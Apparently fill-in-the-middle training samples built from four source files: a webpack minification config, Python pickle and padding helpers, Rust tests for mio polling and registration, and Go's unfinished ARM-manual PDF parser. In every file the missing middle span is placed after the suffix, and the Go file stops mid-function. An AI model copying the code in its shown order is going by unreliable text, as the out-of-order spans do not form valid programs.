optimization.ts | const UglifyJsPlugin = require("uglifyjs-webpack-plugin");
const OptimizeCSSAssetsPlugin = require("optimize-css-assets-webpack-plugin");
const cssnano = require("cssnano");
import CoreAPI from "../../CoreAPI";
import { isProductionEnv, isDevelopmentEnv } from "../../utils/environment";
export default (api: CoreAPI) => {
api.chainWebpack(webpackChain => {
if (isProductionEnv()) {
webpackChain.optimization
.splitChunks({
cacheGroups: {
commons: {
test: /[\\/]node_modules[\\/]/,
name: "vendor",
chunks: "initial"
}
}
})
.minimizer("script")
.use(UglifyJsPlugin, [
{
cache: true,
parallel: true,
uglifyOptions: {
ecma: 5,
mangle: true, | },
sourceMap: false // FIXME: support source map from option
}
])
.end()
.minimizer("css")
.use(OptimizeCSSAssetsPlugin, [
{
assetNameRegExp: /\.css$/g,
cssProcessor: cssnano,
cssProcessorOptions: {
reduceIdents: false,
mergeIdents: false,
discardUnused: false,
autoprefixer: false,
zindex: false,
map: false // FIXME: support source map from option
}
}
])
.end();
}
});
}; | compress: {
drop_console: true
} |
utils.py | import os
import pickle
import torch
import numpy as np
def save(toBeSaved, filename, mode='wb'):
# An empty dirname (a bare filename) would make os.makedirs fail, so guard it.
dirname = os.path.dirname(filename)
if dirname and not os.path.exists(dirname):
os.makedirs(dirname)
with open(filename, mode) as file:
pickle.dump(toBeSaved, file)
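# Hypothetical usage: save(history, "runs/exp1/history.pkl") creates runs/exp1/ first.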
def load(filename, mode='rb'):
with open(filename, mode) as file:
loaded = pickle.load(file)
return loaded
def pad_sents(sents, pad_token):
lens = get_lens(sents)
max_len = max(lens)
sents_padded = [sents[i] + [pad_token] * (max_len - l) for i, l in enumerate(lens)]
return sents_padded
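# For example, pad_sents([[1, 2], [3]], 0) returns [[1, 2], [3, 0]].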
def sort_sents(sents, reverse=True):
sents.sort(key=(lambda s: len(s)), reverse=reverse)
return sents
def get_mask(sents, unmask_idx=1, mask_idx=0):
lens = get_lens(sents)
max_len = max(lens)
mask = [([unmask_idx] * l + [mask_idx] * (max_len - l)) for l in lens]
return mask
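# For example, get_mask([[1, 2], [3]]) returns [[1, 1], [1, 0]].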
def get_lens(sents):
return [len(sent) for sent in sents]
def get_max_len(sents):
max_len = max([len(sent) for sent in sents])
return max_len
def truncate_sents(sents, length):
|
def get_loss_weight(labels, label_order):
nums = [np.sum(labels == lo) for lo in label_order]
loss_weight = torch.tensor([n / len(labels) for n in nums])
return loss_weight
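# For example, labels = np.array([0, 0, 1]) with label_order = [0, 1] gives
# roughly tensor([0.6667, 0.3333]): weights are proportional to class frequency.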
| sents = [sent[:length] for sent in sents]
return sents |
poll.rs | #![cfg(all(feature = "os-poll", feature = "tcp"))]
use mio::event::Source;
use mio::net::{TcpListener, TcpStream, UdpSocket};
use mio::{event, Events, Interest, Poll, Registry, Token};
use std::net;
use std::sync::{Arc, Barrier};
use std::thread::{self, sleep};
use std::time::Duration;
use std::{fmt, io};
mod util;
use util::{
any_local_address, assert_send, assert_sync, expect_events, init, init_with_poll, ExpectEvent,
};
const ID1: Token = Token(1);
const ID2: Token = Token(2);
const ID3: Token = Token(3);
#[test]
fn is_send_and_sync() {
assert_send::<Events>();
assert_sync::<Events>();
assert_sync::<Poll>();
assert_send::<Poll>();
assert_sync::<Registry>();
assert_send::<Registry>();
}
#[test]
fn run_once_with_nothing() {
init();
let mut events = Events::with_capacity(16);
let mut poll = Poll::new().unwrap();
poll.poll(&mut events, Some(Duration::from_millis(100)))
.unwrap();
}
#[test]
fn add_then_drop() {
init();
let mut events = Events::with_capacity(16);
let mut l = TcpListener::bind(any_local_address()).unwrap();
let mut poll = Poll::new().unwrap();
poll.registry()
.register(&mut l, Token(1), Interest::READABLE | Interest::WRITABLE)
.unwrap();
drop(l);
poll.poll(&mut events, Some(Duration::from_millis(100)))
.unwrap();
}
#[test]
fn zero_duration_polls_events() {
init();
let mut poll = Poll::new().unwrap();
let mut events = Events::with_capacity(16);
let listener = net::TcpListener::bind(any_local_address()).unwrap();
let addr = listener.local_addr().unwrap();
let streams: Vec<TcpStream> = (0..3)
.map(|n| {
let mut stream = TcpStream::connect(addr).unwrap();
poll.registry()
.register(&mut stream, Token(n), Interest::WRITABLE)
.unwrap();
stream
})
.collect();
// Ensure the TcpStreams have some time to connect and for the events to
// show up.
sleep(Duration::from_millis(10));
// Even when passing a zero duration timeout we still want to do the system
// call.
poll.poll(&mut events, Some(Duration::from_nanos(0)))
.unwrap();
assert!(!events.is_empty());
// Both need to live until here.
drop(streams);
drop(listener);
}
#[test]
fn poll_closes_fd() {
init();
for _ in 0..2000 {
let mut poll = Poll::new().unwrap();
let mut events = Events::with_capacity(4);
poll.poll(&mut events, Some(Duration::from_millis(0)))
.unwrap();
drop(poll);
}
}
#[test]
fn drop_cancels_interest_and_shuts_down() {
init();
use mio::net::TcpStream;
use std::io;
use std::io::Read;
use std::net::TcpListener;
use std::thread;
let l = TcpListener::bind("127.0.0.1:0").unwrap();
let addr = l.local_addr().unwrap();
let t = thread::spawn(move || {
let mut s = l.incoming().next().unwrap().unwrap();
s.set_read_timeout(Some(Duration::from_secs(5)))
.expect("set_read_timeout");
let r = s.read(&mut [0; 16]);
match r {
Ok(_) => (),
Err(e) => {
if e.kind() != io::ErrorKind::UnexpectedEof {
panic!("{}", e);
}
}
}
});
let mut poll = Poll::new().unwrap();
let mut s = TcpStream::connect(addr).unwrap();
poll.registry()
.register(&mut s, Token(1), Interest::READABLE | Interest::WRITABLE)
.unwrap();
let mut events = Events::with_capacity(16);
'outer: loop {
poll.poll(&mut events, None).unwrap();
for event in &events {
if event.token() == Token(1) {
// connected
break 'outer;
}
}
}
let mut b = [0; 1024];
match s.read(&mut b) {
Ok(_) => panic!("unexpected ok"),
Err(ref e) if e.kind() == io::ErrorKind::WouldBlock => (),
Err(e) => panic!("unexpected error: {:?}", e),
}
drop(s);
t.join().unwrap();
}
#[test]
fn registry_behind_arc() {
// `Registry` should work behind an `Arc`, being `Sync` and `Send`.
init();
let mut poll = Poll::new().unwrap();
let registry = Arc::new(poll.registry().try_clone().unwrap());
let mut events = Events::with_capacity(128);
let mut listener = TcpListener::bind(any_local_address()).unwrap();
let addr = listener.local_addr().unwrap();
let barrier = Arc::new(Barrier::new(3));
let registry2 = Arc::clone(®istry);
let registry3 = Arc::clone(®istry);
let barrier2 = Arc::clone(&barrier);
let barrier3 = Arc::clone(&barrier);
let handle1 = thread::spawn(move || {
registry2
.register(&mut listener, Token(0), Interest::READABLE)
.unwrap();
barrier2.wait();
});
let handle2 = thread::spawn(move || {
let mut stream = TcpStream::connect(addr).unwrap();
registry3
.register(
&mut stream,
Token(1),
Interest::READABLE | Interest::WRITABLE,
)
.unwrap();
barrier3.wait();
});
poll.poll(&mut events, Some(Duration::from_millis(1000)))
.unwrap();
assert!(events.iter().count() >= 1);
// Let the threads return.
barrier.wait();
handle1.join().unwrap();
handle2.join().unwrap();
}
/// Call all registration operations, ending with `source` being registered with `token` and `final_interests`.
pub fn registry_ops_flow(
registry: &Registry,
source: &mut dyn Source,
token: Token,
init_interests: Interest,
final_interests: Interest,
) -> io::Result<()> {
registry.register(source, token, init_interests).unwrap();
registry.deregister(source).unwrap();
registry.register(source, token, init_interests).unwrap();
registry.reregister(source, token, final_interests)
}
#[test]
fn registry_operations_are_thread_safe() |
#[test]
fn register_during_poll() {
let (mut poll, mut events) = init_with_poll();
let registry = poll.registry().try_clone().unwrap();
let barrier = Arc::new(Barrier::new(2));
let barrier1 = Arc::clone(&barrier);
let handle1 = thread::spawn(move || {
let mut stream = UdpSocket::bind(any_local_address()).unwrap();
barrier1.wait();
// Get closer to "trying" to register during a poll by doing a short
// sleep before registering, giving the main thread enough time to start
// waiting on the 5-second poll.
sleep(Duration::from_millis(200));
registry
.register(&mut stream, ID1, Interest::WRITABLE)
.unwrap();
barrier1.wait();
drop(stream);
});
// Unlock the thread, allow it to register the `UdpSocket`.
barrier.wait();
// Concurrently (at least we attempt to) call `Poll::poll`.
poll.poll(&mut events, Some(Duration::from_secs(5)))
.unwrap();
let mut iter = events.iter();
let event = iter.next().expect("expect an event");
assert_eq!(event.token(), ID1);
assert!(event.is_writable());
assert!(iter.next().is_none(), "unexpected extra event");
barrier.wait();
handle1.join().unwrap();
}
// This test checks the following reregister constraints:
// - `reregister` arguments fully override the previous values. In other
// words, if a socket is registered with `READABLE` interest and the call
// to `reregister` specifies `WRITABLE`, then read interest is no longer
// requested for the handle.
// - `reregister` can use the same token as `register`
// - `reregister` can use different token from `register`
// - multiple `reregister` are ok
#[test]
fn reregister_interest_token_usage() {
let (mut poll, mut events) = init_with_poll();
let mut udp_socket = UdpSocket::bind(any_local_address()).unwrap();
poll.registry()
.register(&mut udp_socket, ID1, Interest::READABLE)
.expect("unable to register listener");
poll.registry()
.reregister(&mut udp_socket, ID1, Interest::READABLE)
.expect("unable to register listener");
poll.registry()
.reregister(&mut udp_socket, ID2, Interest::WRITABLE)
.expect("unable to register listener");
expect_events(
&mut poll,
&mut events,
vec![ExpectEvent::new(ID2, Interest::WRITABLE)],
);
}
// This test checks the following register constraint:
// The event source must **not** have been previously registered with this
// instance of `Poll`, otherwise the behavior is undefined.
//
// This test is done on Windows and epoll platforms where registering a
// source twice is defined behavior that fail with an error code.
//
// On kqueue platforms registering twice (not *re*registering) works, but that
// is not a test goal, so it is not tested.
#[test]
#[cfg(any(target_os = "linux", target_os = "windows"))]
pub fn double_register_different_token() {
init();
let poll = Poll::new().unwrap();
let mut l = TcpListener::bind("127.0.0.1:0".parse().unwrap()).unwrap();
poll.registry()
.register(&mut l, Token(0), Interest::READABLE)
.unwrap();
assert!(poll
.registry()
.register(&mut l, Token(1), Interest::READABLE)
.is_err());
}
#[test]
fn poll_ok_after_cancelling_pending_ops() {
let (mut poll, mut events) = init_with_poll();
let mut listener = TcpListener::bind(any_local_address()).unwrap();
let address = listener.local_addr().unwrap();
let registry = Arc::new(poll.registry().try_clone().unwrap());
let registry1 = Arc::clone(®istry);
let barrier = Arc::new(Barrier::new(2));
let barrier1 = Arc::clone(&barrier);
registry
.register(&mut listener, ID1, Interest::READABLE)
.unwrap();
// Call a dummy poll just to submit an afd poll request
poll.poll(&mut events, Some(Duration::from_millis(0)))
.unwrap();
// This reregister will cancel the previous pending poll op.
// The token is different from the one registered above, which ensures
// the proper event is returned by expect_events below.
registry
.reregister(&mut listener, ID2, Interest::READABLE)
.unwrap();
let handle = thread::spawn(move || {
let mut stream = TcpStream::connect(address).unwrap();
barrier1.wait();
registry1
.register(&mut stream, ID3, Interest::WRITABLE)
.unwrap();
barrier1.wait();
});
// Is the listener ready to accept a stream? Getting `READABLE` here means
// the cancelled poll op was cleared and another poll request was
// submitted, which resulted in this event being returned.
expect_events(
&mut poll,
&mut events,
vec![ExpectEvent::new(ID2, Interest::READABLE)],
);
let (_, _) = listener.accept().unwrap();
barrier.wait();
// for the sake of completeness check stream `WRITABLE`
expect_events(
&mut poll,
&mut events,
vec![ExpectEvent::new(ID3, Interest::WRITABLE)],
);
barrier.wait();
handle.join().expect("unable to join thread");
}
struct TestEventSource {
registrations: Vec<(Token, Interest)>,
reregistrations: Vec<(Token, Interest)>,
deregister_count: usize,
}
impl TestEventSource {
fn new() -> TestEventSource {
TestEventSource {
registrations: Vec::new(),
reregistrations: Vec::new(),
deregister_count: 0,
}
}
}
impl event::Source for TestEventSource {
fn register(
&mut self,
_registry: &Registry,
token: Token,
interests: Interest,
) -> io::Result<()> {
self.registrations.push((token, interests));
Ok(())
}
fn reregister(
&mut self,
_registry: &Registry,
token: Token,
interests: Interest,
) -> io::Result<()> {
self.reregistrations.push((token, interests));
Ok(())
}
fn deregister(&mut self, _registry: &Registry) -> io::Result<()> {
self.deregister_count += 1;
Ok(())
}
}
#[test]
fn poll_registration() {
init();
let poll = Poll::new().unwrap();
let registry = poll.registry();
let mut source = TestEventSource::new();
let token = Token(0);
let interests = Interest::READABLE;
registry.register(&mut source, token, interests).unwrap();
assert_eq!(source.registrations.len(), 1);
assert_eq!(source.registrations.get(0), Some(&(token, interests)));
assert!(source.reregistrations.is_empty());
assert_eq!(source.deregister_count, 0);
let re_token = Token(0);
let re_interests = Interest::READABLE;
registry
.reregister(&mut source, re_token, re_interests)
.unwrap();
assert_eq!(source.registrations.len(), 1);
assert_eq!(source.reregistrations.len(), 1);
assert_eq!(
source.reregistrations.get(0),
Some(&(re_token, re_interests))
);
assert_eq!(source.deregister_count, 0);
registry.deregister(&mut source).unwrap();
assert_eq!(source.registrations.len(), 1);
assert_eq!(source.reregistrations.len(), 1);
assert_eq!(source.deregister_count, 1);
}
struct ErroneousTestEventSource;
impl event::Source for ErroneousTestEventSource {
fn register(
&mut self,
_registry: &Registry,
_token: Token,
_interests: Interest,
) -> io::Result<()> {
Err(io::Error::new(io::ErrorKind::Other, "register"))
}
fn reregister(
&mut self,
_registry: &Registry,
_token: Token,
_interests: Interest,
) -> io::Result<()> {
Err(io::Error::new(io::ErrorKind::Other, "reregister"))
}
fn deregister(&mut self, _registry: &Registry) -> io::Result<()> {
Err(io::Error::new(io::ErrorKind::Other, "deregister"))
}
}
#[test]
fn poll_erroneous_registration() {
init();
let poll = Poll::new().unwrap();
let registry = poll.registry();
let mut source = ErroneousTestEventSource;
let token = Token(0);
let interests = Interest::READABLE;
assert_error(registry.register(&mut source, token, interests), "register");
assert_error(
registry.reregister(&mut source, token, interests),
"reregister",
);
assert_error(registry.deregister(&mut source), "deregister");
}
/// Assert that `result` is an error and the formatted error (via
/// `fmt::Display`) equals `expected_msg`.
pub fn assert_error<T, E: fmt::Display>(result: Result<T, E>, expected_msg: &str) {
match result {
Ok(_) => panic!("unexpected OK result"),
Err(err) => assert!(
err.to_string().contains(expected_msg),
"wanted: {}, got: {}",
expected_msg,
err
),
}
}
| {
let (mut poll, mut events) = init_with_poll();
let registry = Arc::new(poll.registry().try_clone().unwrap());
let registry1 = Arc::clone(®istry);
let registry2 = Arc::clone(®istry);
let registry3 = Arc::clone(®istry);
let barrier = Arc::new(Barrier::new(4));
let barrier1 = Arc::clone(&barrier);
let barrier2 = Arc::clone(&barrier);
let barrier3 = Arc::clone(&barrier);
let mut listener = TcpListener::bind(any_local_address()).unwrap();
let addr = listener.local_addr().unwrap();
// Expect that multiple register/deregister/reregister calls work fine across
// multiple threads. The main thread waits before expect_events for the other 3
// threads to do their work; otherwise the expect_events timeout might be too
// short for all threads to complete, and the call might fail.
let handle1 = thread::spawn(move || {
registry_ops_flow(
®istry1,
&mut listener,
ID1,
Interest::READABLE,
Interest::READABLE,
)
.unwrap();
barrier1.wait();
barrier1.wait();
});
let handle2 = thread::spawn(move || {
let mut udp_socket = UdpSocket::bind(any_local_address()).unwrap();
registry_ops_flow(
®istry2,
&mut udp_socket,
ID2,
Interest::WRITABLE,
Interest::WRITABLE.add(Interest::READABLE),
)
.unwrap();
barrier2.wait();
barrier2.wait();
});
let handle3 = thread::spawn(move || {
let mut stream = TcpStream::connect(addr).unwrap();
registry_ops_flow(
®istry3,
&mut stream,
ID3,
Interest::READABLE,
Interest::READABLE | Interest::WRITABLE,
)
.unwrap();
barrier3.wait();
barrier3.wait();
});
// wait for threads to finish before expect_events
barrier.wait();
expect_events(
&mut poll,
&mut events,
vec![
ExpectEvent::new(ID1, Interest::READABLE),
ExpectEvent::new(ID2, Interest::WRITABLE),
ExpectEvent::new(ID3, Interest::WRITABLE),
],
);
// Let the threads return.
barrier.wait();
handle1.join().unwrap();
handle2.join().unwrap();
handle3.join().unwrap();
} |
spec.go | // Copyright 2014 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// Armspec reads the ``ARM Architecture Reference Manual''
// to collect instruction encoding details and writes those details to standard output
// in JSON format.
//
// Warning Warning Warning
//
// This program is unfinished. It is being published in this incomplete form
// for interested readers, but do not expect it to be runnable or useful.
//
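// Intended invocation (a sketch; the input file name here is hypothetical --
// the program writes a JSON array of instruction encodings to stdout):
//
//	armspec arm-reference-manual.pdf > inst.json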
package main
import (
"bufio"
"bytes"
"encoding/json"
"fmt"
"log"
"math"
"os"
"regexp"
"sort"
"strconv"
"strings"
"rsc.io/pdf"
)
type Inst struct {
Name string
ID string
Bits string
Arch string
Syntax []string
Code string
}
const debugPage = 0
var stdout *bufio.Writer
func main() {
log.SetFlags(0)
log.SetPrefix("armspec: ")
if len(os.Args) != 2 {
fmt.Fprintf(os.Stderr, "usage: armspec file.pdf\n")
os.Exit(2)
}
f, err := pdf.Open(os.Args[1])
if err != nil {
log.Fatal(err)
}
// Find instruction set reference in outline, to build instruction list.
instList := instHeadings(f.Outline())
if len(instList) < 200 {
log.Fatalf("only found %d instructions in table of contents", len(instList))
}
stdout = bufio.NewWriter(os.Stdout)
fmt.Fprintf(stdout, "[")
numTable := 0
defer stdout.Flush()
// Scan document looking for instructions.
// Must find exactly the ones in the outline.
n := f.NumPage()
PageLoop:
for pageNum := 1; pageNum <= n; pageNum++ {
if debugPage > 0 && pageNum != debugPage {
continue
}
if pageNum > 1127 {
break
}
p := f.Page(pageNum)
name, table := parsePage(pageNum, p)
if name == "" {
continue
}
if len(table) < 1 {
if false {
fmt.Fprintf(os.Stderr, "no encodings for instruction %q (page %d)\n", name, pageNum)
}
continue
}
for _, inst := range table {
if numTable > 0 {
fmt.Fprintf(stdout, ",")
}
numTable++
js, _ := json.Marshal(inst)
fmt.Fprintf(stdout, "\n%s", jsFix.Replace(string(js)))
}
for j, headline := range instList {
if name == headline {
instList[j] = ""
continue PageLoop
}
}
fmt.Fprintf(os.Stderr, "unexpected instruction %q (page %d)\n", name, pageNum)
}
fmt.Fprintf(stdout, "\n]\n")
stdout.Flush()
if debugPage == 0 {
for _, headline := range instList {
if headline != "" {
switch headline {
default:
fmt.Fprintf(os.Stderr, "missing instruction %q\n", headline)
case "CHKA": // ThumbEE
case "CPS": // system instruction
case "CPY": // synonym for MOV
case "ENTERX": // ThumbEE
case "F* (former VFP instruction mnemonics)": // synonyms
case "HB, HBL, HBLP, HBP": // ThumbEE
case "LEAVEX": // ThumbEE
case "MOV (shifted register)": // pseudo instruction for ASR, LSL, LSR, ROR, and RRX
case "NEG": // synonym for RSB
case "RFE": // system instruction
case "SMC (previously SMI)": // system instruction
case "SRS": // system instruction
case "SUBS PC, LR and related instructions": // system instruction
case "VAND (immediate)": // pseudo instruction
case "VCLE (register)": // pseudo instruction
case "VCLT (register)": // pseudo instruction
case "VORN (immediate)": // pseudo instruction
}
}
}
}
}
func instHeadings(outline pdf.Outline) []string {
return appendInstHeadings(outline, nil)
}
var instRE = regexp.MustCompile(`A[\d.]+ Alphabetical list of instructions`)
var childRE = regexp.MustCompile(`A[\d.]+ (.+)`)
var sectionRE = regexp.MustCompile(`^A[\d.]+$`)
var bitRE = regexp.MustCompile(`^( |[01]|\([01]\))*$`)
func appendInstHeadings(outline pdf.Outline, list []string) []string {
if instRE.MatchString(outline.Title) {
for _, child := range outline.Child {
m := childRE.FindStringSubmatch(child.Title)
if m == nil {
fmt.Fprintf(os.Stderr, "cannot parse section title: %s\n", child.Title)
continue
}
list = append(list, m[1])
}
}
for _, child := range outline.Child {
list = appendInstHeadings(child, list)
}
return list
}
const inch = 72.0
func | (num int, p pdf.Page) (name string, table []Inst) {
content := p.Content()
var text []pdf.Text
for _, t := range content.Text {
if match(t, "Times-Roman", 7.2, "") {
t.FontSize = 9
}
if match(t, "Times-Roman", 6.72, "") && '0' <= t.S[0] && t.S[0] <= '9' {
t.S = string([]rune("⁰¹²³⁴⁵⁶⁷⁸⁹")[t.S[0]-'0'])
t.FontSize = 9
t.Y -= 2.28
}
if t.Font == "Gen_Arial" {
continue
}
text = append(text, t)
}
text = findWords(text)
for i, t := range text {
if t.Font == "Times" {
t.Font = "Times-Roman"
text[i] = t
}
}
if debugPage > 0 {
for _, t := range text {
fmt.Println(t)
}
for _, r := range content.Rect {
fmt.Println(r)
}
}
// Remove text we should ignore.
out := text[:0]
skip := false
for _, t := range text {
// skip page footer
if match(t, "Helvetica", 8, "A") || match(t, "Helvetica", 8, "ARM DDI") || match(t, "Helvetica-Oblique", 8, "Copyright") {
continue
}
// skip section header and body text
if match(t, "Helvetica-Bold", 12, "") && (sectionRE.MatchString(t.S) || t.S == "Alphabetical list of instructions") {
skip = true
continue
}
if skip && match(t, "Times-Roman", 9, "") {
continue
}
skip = false
out = append(out, t)
}
text = out
// Page header must say Instruction Details.
if len(text) == 0 || !match(text[0], "Helvetica-Oblique", 8, "Instruction Details") && !match(text[0], "Times-Roman", 9, "Instruction Details") {
return "", nil
}
text = text[1:]
isSection := func(text []pdf.Text, i int) int {
if i+2 <= len(text) && match(text[i], "Helvetica-Bold", 10, "") && sectionRE.MatchString(text[i].S) && match(text[i+1], "Helvetica-Bold", 10, "") {
return 2
}
if i+1 <= len(text) && match(text[i], "Helvetica-Bold", 10, "") && childRE.MatchString(text[i].S) {
return 1
}
return 0
}
// Skip dummy headlines and sections.
for d := isSection(text, 0); d != 0; d = isSection(text, 0) {
i := d
for i < len(text) && !match(text[i], "Helvetica-Bold", 9, "Encoding") && !match(text[i], "Helvetica-Bold", 10, "") {
i++
}
if isSection(text, i) == 0 {
break
}
text = text[i:]
}
// Next line is headline. Can wrap to multiple lines.
d := isSection(text, 0)
if d == 0 {
if debugPage > 0 {
fmt.Printf("non-inst-headline: %v\n", text[0])
}
checkNoEncodings(num, text)
return "", nil
}
if d == 2 {
name = text[1].S
text = text[2:]
} else if d == 1 {
m := childRE.FindStringSubmatch(text[0].S)
name = m[1]
text = text[1:]
}
for len(text) > 0 && match(text[0], "Helvetica-Bold", 10, "") {
name += " " + text[0].S
text = text[1:]
}
// Skip description.
for len(text) > 0 && (match(text[0], "Times-Roman", 9, "") || match(text[0], "LucidaSansTypewriteX", 6.48, "") || match(text[0], "Times-Bold", 10, "Note")) {
text = text[1:]
}
// Encodings follow.
warned := false
for i := 0; i < len(text); {
if match(text[i], "Helvetica-Bold", 10, "Assembler syntax") ||
match(text[i], "Helvetica-Bold", 9, "Modified operation in ThumbEE") ||
match(text[i], "Helvetica-Bold", 9, "Unallocated memory hints") ||
match(text[i], "Helvetica-Bold", 9, "Related encodings") ||
match(text[i], "Times-Roman", 9, "Figure A") ||
match(text[i], "Helvetica-Bold", 9, "Table A") ||
match(text[i], "Helvetica-Bold", 9, "VFP Instructions") ||
match(text[i], "Helvetica-Bold", 9, "VFP instructions") ||
match(text[i], "Helvetica-Bold", 9, "VFP vectors") ||
match(text[i], "Helvetica-Bold", 9, "FLDMX") ||
match(text[i], "Helvetica-Bold", 9, "FSTMX") ||
match(text[i], "Helvetica-Bold", 9, "Advanced SIMD and VFP") {
checkNoEncodings(num, text[i:])
break
}
if match(text[i], "Helvetica-Bold", 9, "Figure A") {
y := text[i].Y
i++
for i < len(text) && math.Abs(text[i].Y-y) < 2 {
i++
}
continue
}
if !match(text[i], "Helvetica-Bold", 9, "Encoding") {
if !warned {
warned = true
fmt.Fprintln(os.Stderr, "page", num, ": unexpected:", text[i])
}
i++
continue
}
inst := Inst{
Name: name,
}
enc := text[i].S
x := text[i].X
i++
// Possible subarchitecture notes.
for i < len(text) && text[i].X > x+36 {
if inst.Arch != "" {
inst.Arch += " "
}
inst.Arch += text[i].S
i++
}
// Encoding syntaxes.
for i < len(text) && (match(text[i], "LucidaSansTypewriteX", 6.48, "") || text[i].X > x+36) {
if text[i].X < x+0.25*inch {
inst.Syntax = append(inst.Syntax, text[i].S)
} else {
s := inst.Syntax[len(inst.Syntax)-1]
if !strings.Contains(s, "\t") {
s += "\t"
} else {
s += " "
}
s += text[i].S
inst.Syntax[len(inst.Syntax)-1] = s
}
i++
}
var bits, abits, aenc string
bits, i = readBitBox(inst.Name, inst.Syntax, content, text, i)
if strings.Contains(enc, " / ") {
if i < len(text) && match(text[i], "Times-Roman", 8, "") {
abits, i = readBitBox(inst.Name, inst.Syntax, content, text, i)
} else {
abits = bits
}
slash := strings.Index(enc, " / ")
aenc = "Encoding " + enc[slash+len(" / "):]
enc = enc[:slash]
}
// pseudocode
y0 := -1 * inch
tab := 0.0
for i < len(text) && match(text[i], "LucidaSansTypewriteX", 6.48, "") {
t := text[i]
i++
if math.Abs(t.Y-y0) < 3 {
// same line as last fragment, probably just two spaces
inst.Code += " " + t.S
continue
}
if inst.Code != "" {
inst.Code += "\n"
}
if t.X > x+0.1*inch {
if tab == 0 {
tab = t.X - x
}
inst.Code += strings.Repeat("\t", int((t.X-x)/tab+0.5))
} else {
tab = 0
}
inst.Code += t.S
y0 = t.Y
}
inst.ID = strings.TrimPrefix(enc, "Encoding ")
inst.Bits = bits
table = append(table, inst)
if abits != "" {
inst.ID = strings.TrimPrefix(aenc, "Encoding ")
inst.Bits = abits
table = append(table, inst)
}
}
return name, table
}
func readBitBox(name string, syntax []string, content pdf.Content, text []pdf.Text, i int) (string, int) {
// bit headings
y2 := 0.0
x1 := 0.0
x2 := 0.0
for i < len(text) && match(text[i], "Times-Roman", 8, "") {
if y2 == 0 {
y2 = text[i].Y
}
if x1 == 0 {
x1 = text[i].X
}
i++
}
// bit fields in box
y1 := 0.0
dy1 := 0.0
for i < len(text) && match(text[i], "Times-Roman", 9, "") {
if x2 < text[i].X+text[i].W {
x2 = text[i].X + text[i].W
}
y1 = text[i].Y
dy1 = text[i].FontSize
i++
}
if debugPage > 0 {
fmt.Println("encoding box", x1, y1, x2, y2)
}
// Find lines (thin rectangles) separating bit fields.
var bottom, top pdf.Rect
const (
yMargin = 0.25 * 72
xMargin = 2 * 72
)
for _, r := range content.Rect {
if r.Max.Y-r.Min.Y < 2 && x1-xMargin < r.Min.X && r.Min.X < x1 && x2 < r.Max.X && r.Max.X < x2+xMargin {
if y1-yMargin < r.Min.Y && r.Min.Y < y1 {
bottom = r
}
if y1+dy1 < r.Min.Y && r.Min.Y < y2 {
top = r
}
}
}
if debugPage > 0 {
fmt.Println("top", top, "bottom", bottom)
}
const ε = 0.1 * 72
var bars []pdf.Rect
for _, r := range content.Rect {
if r.Max.X-r.Min.X < 2 && math.Abs(r.Min.Y-bottom.Min.Y) < ε && math.Abs(r.Max.Y-top.Min.Y) < ε {
bars = append(bars, r)
}
}
sort.Sort(RectHorizontal(bars))
// There are 16-bit and 32-bit encodings.
// In practice, they are about 2.65 and 5.3 inches wide, respectively.
// Use 4 inches as a cutoff.
nbit := 32
dx := top.Max.X - top.Min.X
if dx < 4*72 {
nbit = 16
}
total := 0
var buf bytes.Buffer
for i := 0; i < len(bars)-1; i++ {
if i > 0 {
fmt.Fprintf(&buf, "|")
}
var sub []pdf.Text
x1, x2 := bars[i].Min.X, bars[i+1].Min.X
for _, t := range content.Text {
tx := t.X + t.W/2
ty := t.Y + t.FontSize/2
if x1 < tx && tx < x2 && y1 < ty && ty < y2 {
sub = append(sub, t)
}
}
var str []string
for _, t := range findWords(sub) {
str = append(str, t.S)
}
s := strings.Join(str, " ")
s = strings.Replace(s, ")(", ") (", -1)
n := len(strings.Fields(s))
b := int(float64(nbit)*(x2-x1)/dx + 0.5)
if n == b {
for j, f := range strings.Fields(s) {
if j > 0 {
fmt.Fprintf(&buf, "|")
}
fmt.Fprintf(&buf, "%s", f)
}
} else {
if n != 1 {
fmt.Fprintf(os.Stderr, "%s - %s - multi-field %d-bit encoding: %s\n", name, syntax, n, s)
}
fmt.Fprintf(&buf, "%s:%d", s, b)
}
total += b
}
if total != nbit || total == 0 {
fmt.Fprintf(os.Stderr, "%s - %s - %d-bit encoding\n", name, syntax, total)
}
return buf.String(), i
}
type RectHorizontal []pdf.Rect
func (x RectHorizontal) Swap(i, j int) { x[i], x[j] = x[j], x[i] }
func (x RectHorizontal) Less(i, j int) bool { return x[i].Min.X < x[j].Min.X }
func (x RectHorizontal) Len() int { return len(x) }
func checkNoEncodings(num int, text []pdf.Text) {
for _, t := range text {
if match(t, "Helvetica-Bold", 9, "Encoding") {
fmt.Fprintf(os.Stderr, "page %d: unexpected encoding: %s\n", num, t.S)
}
}
}
func match(t pdf.Text, font string, size float64, substr string) bool {
return t.Font == font && math.Abs(t.FontSize-size) < 0.1 && strings.Contains(t.S, substr)
}
func findWords(chars []pdf.Text) (words []pdf.Text) {
// Sort by Y coordinate and normalize.
const nudge = 1
sort.Sort(pdf.TextVertical(chars))
old := -100000.0
for i, c := range chars {
if c.Y != old && math.Abs(old-c.Y) < nudge {
chars[i].Y = old
} else {
old = c.Y
}
}
// Sort by Y coordinate, breaking ties with X.
// This will bring letters in a single word together.
sort.Sort(pdf.TextVertical(chars))
// Loop over chars.
for i := 0; i < len(chars); {
// Find all chars on line.
j := i + 1
for j < len(chars) && chars[j].Y == chars[i].Y {
j++
}
var end float64
// Split line into words (really, phrases).
for k := i; k < j; {
ck := &chars[k]
s := ck.S
end = ck.X + ck.W
charSpace := ck.FontSize / 6
wordSpace := ck.FontSize * 2 / 3
l := k + 1
for l < j {
// Grow word.
cl := &chars[l]
if sameFont(cl.Font, ck.Font) && math.Abs(cl.FontSize-ck.FontSize) < 0.1 && cl.X <= end+charSpace {
s += cl.S
end = cl.X + cl.W
l++
continue
}
// Add space to phrase before next word.
if sameFont(cl.Font, ck.Font) && math.Abs(cl.FontSize-ck.FontSize) < 0.1 && cl.X <= end+wordSpace {
s += " " + cl.S
end = cl.X + cl.W
l++
continue
}
break
}
f := ck.Font
f = strings.TrimSuffix(f, ",Italic")
f = strings.TrimSuffix(f, "-Italic")
words = append(words, pdf.Text{f, ck.FontSize, ck.X, ck.Y, end - ck.X, s})
k = l
}
i = j
}
return words
}
func sameFont(f1, f2 string) bool {
f1 = strings.TrimSuffix(f1, ",Italic")
f1 = strings.TrimSuffix(f1, "-Italic")
f2 = strings.TrimSuffix(f2, ",Italic")
f2 = strings.TrimSuffix(f2, "-Italic")
